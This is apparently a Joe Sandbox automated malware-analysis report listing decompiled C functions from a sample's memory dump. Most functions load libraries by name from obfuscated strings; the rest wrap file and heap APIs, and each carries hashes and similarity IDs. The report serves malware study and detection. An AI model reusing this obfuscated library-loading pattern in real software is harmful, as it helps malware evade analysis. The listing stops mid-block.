                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C728F() {
                                                                                                                                                            				char _v5;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				struct HINSTANCE__* _t8;
                                                                                                                                                            
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x604, 0xf, 0xb,  &_v16);
                                                                                                                                                            				_v5 = 0;
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t8 = LoadLibraryA( &_v16); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6EA0() {
                                                                                                                                                            				char _v5;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				struct HINSTANCE__* _t8;
                                                                                                                                                            
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x534, 0xe, 0xb,  &_v16);
                                                                                                                                                            				_v5 = 0;
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t8 = LoadLibraryA( &_v16); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C721D() {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				struct HINSTANCE__* _t8;
                                                                                                                                                            
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x3f7, 5, 0xc,  &_v20);
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t8 = LoadLibraryA( &_v20); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 71d7cae8e99da20d45a1f3544b95a1b34be0e0e975b6b2bb174a2511073109b3
                                                                                                                                                            • Instruction ID: 8fcce906a693f7bdecd6bfdf58c6d9be0c36c6b171ba8d1000c62cb3bc58c253
                                                                                                                                                            • Opcode Fuzzy Hash: 71d7cae8e99da20d45a1f3544b95a1b34be0e0e975b6b2bb174a2511073109b3
                                                                                                                                                            • Instruction Fuzzy Hash: DCD01255D8424D77E710F6E45C0BF7E775CDB40700F450599BA14A61C2E9A1961487A3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7256() {
                                                                                                                                                            				char _v5;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				struct HINSTANCE__* _t8;
                                                                                                                                                            
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x3dd, 8, 0xb,  &_v16);
                                                                                                                                                            				_v5 = 0;
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t8 = LoadLibraryA( &_v16); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 453862d70e044f3766d3a873356827b57bd7d6ee718d358cbdd52f142b63ee52
                                                                                                                                                            • Instruction ID: 5f62b576872f8252ac1c4584768ed8674bdc918984eb366920eb0e3681a3e296
                                                                                                                                                            • Opcode Fuzzy Hash: 453862d70e044f3766d3a873356827b57bd7d6ee718d358cbdd52f142b63ee52
                                                                                                                                                            • Instruction Fuzzy Hash: 7DD05B55D8434C37E621F6E46C07F5D735C9B50700F404195BE14E51C1EDE1A61887E3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6E67() {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				struct HINSTANCE__* _t8;
                                                                                                                                                            
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x216, 4, 0xc,  &_v20);
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t8 = LoadLibraryA( &_v20); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: fdae2b3855f203940ae8068327db5fe94288019f05903ab7663a5d0b7e8478b4
                                                                                                                                                            • Instruction ID: 5b72aa2d4099ae72299350a968bfeece9208115c82fcd43e5f129440cc6eaf65
                                                                                                                                                            • Opcode Fuzzy Hash: fdae2b3855f203940ae8068327db5fe94288019f05903ab7663a5d0b7e8478b4
                                                                                                                                                            • Instruction Fuzzy Hash: B1D0C261D8024C76E720FAE44C07FBE735C9B40700F400199BA14A61C2E9B1951087A3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7301() {
                                                                                                                                                            				char _v5;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				struct HINSTANCE__* _t8;
                                                                                                                                                            
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x55e, 4, 0xb,  &_v16);
                                                                                                                                                            				_v5 = 0;
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t8 = LoadLibraryA( &_v16); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 1ac93c8163f534f67972bafc3595df03f1b104d090792a726a2ae6fadad2e4a9
                                                                                                                                                            • Instruction ID: 88f39f81fabee933d1ef17522849924e09fab3e550f728874d63f9500a3c1baa
                                                                                                                                                            • Opcode Fuzzy Hash: 1ac93c8163f534f67972bafc3595df03f1b104d090792a726a2ae6fadad2e4a9
                                                                                                                                                            • Instruction Fuzzy Hash: 46D05B55D8434C37E620FAE45C07F5D735C8B40714F404195BF14E51C1E9B2971487E3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C733A() {
                                                                                                                                                            				char _v7;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				struct HINSTANCE__* _t8;
                                                                                                                                                            
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x6de, 6, 9,  &_v16);
                                                                                                                                                            				_v7 = 0;
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t8 = LoadLibraryA( &_v16); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6F56() {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				struct HINSTANCE__* _t8;
                                                                                                                                                            
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x5d9, 0xd, 0xc,  &_v20);
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t8 = LoadLibraryA( &_v20); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C73BB(intOrPtr _a4, void* _a8, long _a12) {
                                                                                                                                                            				void* _t8;
                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                            
                                                                                                                                                            				_t12 = _a4;
                                                                                                                                                            				_t8 = CreateIoCompletionPort(_a8,  *(_t12 + 4), _a12, 0); // executed
                                                                                                                                                            				return 0 |  *(_t12 + 4) == _t8;
                                                                                                                                                            			}






                                                                                                                                                            APIs
                                                                                                                                                            • CreateIoCompletionPort.KERNEL32(?,?,009C38EE,00000000,00000000,?,009C38EE,?,?,00000000), ref: 009C73CD
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CompletionCreatePort
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 499945625-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7845(WCHAR* _a4, long _a8, long _a12, long _a16, long _a20) {
                                                                                                                                                            				void* _t6;
                                                                                                                                                            
                                                                                                                                                            				_t6 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, 0); // executed
                                                                                                                                                            				_t7 =  ==  ? 0 : _t6;
                                                                                                                                                            				return  ==  ? 0 : _t6;
                                                                                                                                                            			}





                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?,009C417E,00000000,40000000,00000000,00000002,00000000,00000000,00000000), ref: 009C785B
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C474E(void* _a4, intOrPtr _a8) {
                                                                                                                                                            				intOrPtr _t3;
                                                                                                                                                            				void* _t5;
                                                                                                                                                            
                                                                                                                                                            				_t3 = _a8;
                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                            					_t5 = RtlAllocateHeap(_a4, 8, _t3 + _t3); // executed
                                                                                                                                                            					return _t5;
                                                                                                                                                            				} else {
                                                                                                                                                            					return _t3;
                                                                                                                                                            				}
                                                                                                                                                            			}






                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(009C1C60,00000008,?), ref: 009C4762
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,009C1A54,00000000,00000000,?,00000000,?), ref: 009C526C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                                            • Opcode ID: c90d1957a7b5a3c46555ecca2ec71d87365f7f4cb310537108b8c0866ef505b0
                                                                                                                                                            • Instruction ID: 66d13eaea4c5b03fc1246f21bb96ee4602e563bf1c53f294918db93f7f41594f
                                                                                                                                                            • Opcode Fuzzy Hash: c90d1957a7b5a3c46555ecca2ec71d87365f7f4cb310537108b8c0866ef505b0
                                                                                                                                                            • Instruction Fuzzy Hash: 27C0122681920C9ACB00FBF09A09489B7FC960C200B400591D805A2040F6659A9482A1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7600(struct _OVERLAPPED* _a4, void* _a8, long _a12) {
                                                                                                                                                            				int _t6;
                                                                                                                                                            
                                                                                                                                                            				_t6 = WriteFile( *(_a4 + 0x14), _a8, _a12, 0, _a4); // executed
                                                                                                                                                            				return _t6;
                                                                                                                                                            			}

                                                                                                                                                            APIs
                                                                                                                                                            • WriteFile.KERNEL32(?,?,009C3673,00000000,?,?,009C3713,?,?,?,?,?), ref: 009C7612
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                            • Opcode ID: ee4317ac24642f67cf6b5b44f07f0de6b08d59eba043ee9c85b574765dd9a4ee
                                                                                                                                                            • Instruction ID: 98f5fdfbd451d0fc43e90ed507895a4c79f369701c9ab6d280d4b70dad6b6d02
                                                                                                                                                            • Opcode Fuzzy Hash: ee4317ac24642f67cf6b5b44f07f0de6b08d59eba043ee9c85b574765dd9a4ee
                                                                                                                                                            • Instruction Fuzzy Hash: 68C00236154248BFDF015F85EC05EAA3B69EB08611F404051FA184A161C772E9A0AB55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C75CC(struct _OVERLAPPED* _a4, void* _a8, long _a12) {
                                                                                                                                                            				int _t6;
                                                                                                                                                            
                                                                                                                                                            				_t6 = ReadFile( *(_a4 + 0x14), _a8, _a12, 0, _a4); // executed
                                                                                                                                                            				return _t6;
                                                                                                                                                            			}

                                                                                                                                                            APIs
                                                                                                                                                            • ReadFile.KERNEL32(?,?,009C367E,00000000,?,?,009C329C,?,?), ref: 009C75DE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                            • Opcode ID: 620e719d83faccfe4f8752869969fa87ba8465c4b7b415bd697c15b334562f68
                                                                                                                                                            • Instruction ID: 34e6c269df6690e9e461dd966040df21c2a296dd8f1fd16d34a1ff439e712ae7
                                                                                                                                                            • Opcode Fuzzy Hash: 620e719d83faccfe4f8752869969fa87ba8465c4b7b415bd697c15b334562f68
                                                                                                                                                            • Instruction Fuzzy Hash: 0DC00236154208BFDF115F88EC05FAA3F69EB48611F104451BA184A1A1C672E960AB55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C476A(void _a4) {
                                                                                                                                                            				void* _t5;
                                                                                                                                                            
                                                                                                                                                            				_t4 =  !=  ? _a4 : 0x400000;
                                                                                                                                                            				_t5 = HeapCreate(0,  !=  ? _a4 : 0x400000, 0); // executed
                                                                                                                                                            				return _t5;
                                                                                                                                                            			}

                                                                                                                                                            APIs
                                                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,?,009C749B,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C477F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 10892065-0
                                                                                                                                                            • Opcode ID: 3f46c0b354607a6a305ef785ec091577c759345b9462cf1df13b57d2f6c5c0ad
                                                                                                                                                            • Instruction ID: 828ada6264cd76190fee33a124a14cd8fb2f281909a8efdf58c81d492881cb11
                                                                                                                                                            • Opcode Fuzzy Hash: 3f46c0b354607a6a305ef785ec091577c759345b9462cf1df13b57d2f6c5c0ad
                                                                                                                                                            • Instruction Fuzzy Hash: 97C08C31288208FBEB008A80EC05BA537DCEB00786F008021FB1C890C0C3B1A8808A98
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C789D(void* _a4, void* _a8, long _a12, DWORD* _a16) {
                                                                                                                                                            				int _t5;
                                                                                                                                                            
                                                                                                                                                            				_t5 = WriteFile(_a4, _a8, _a12, _a16, 0); // executed
                                                                                                                                                            				return _t5;
                                                                                                                                                            			}

                                                                                                                                                            APIs
                                                                                                                                                            • WriteFile.KERNEL32(00000FE6,00000000,009C41A9,?,00000000,?,009C41A9,00000000,00000FE6,?), ref: 009C78AE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                            • Opcode ID: e3bc6b0ed96c450624703ab0d611676ddde68c47f50079f1f6672b97d548948f
                                                                                                                                                            • Instruction ID: 8bf155798268ff3a095faae75ff3c5dfd244e56ef117f3f4d82c7e9de0989565
                                                                                                                                                            • Opcode Fuzzy Hash: e3bc6b0ed96c450624703ab0d611676ddde68c47f50079f1f6672b97d548948f
                                                                                                                                                            • Instruction Fuzzy Hash: 28C0023214424DBBDF025F81EC05A993F2AEB08661F404011FA1814060877295B0AB55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C4795(void* _a4, void* _a8) {
                                                                                                                                                            				signed char _t3;
                                                                                                                                                            
                                                                                                                                                            				_t3 = RtlFreeHeap(_a4, 0, _a8); // executed
                                                                                                                                                            				return _t3 & 0x000000ff;
                                                                                                                                                            			}





                                                                                                                                                            APIs
                                                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C47A0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7373(CHAR* _a4) {
                                                                                                                                                            				struct HINSTANCE__* _t3;
                                                                                                                                                            
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t3 = LoadLibraryA(_a4); // executed
                                                                                                                                                            				return _t3;
                                                                                                                                                            			}





                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryA.KERNEL32(00000009,?,009C6FC2,?,009D12D0,0000007A,00000009,00000009,?,?,009C6DEC,?), ref: 009C7384
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
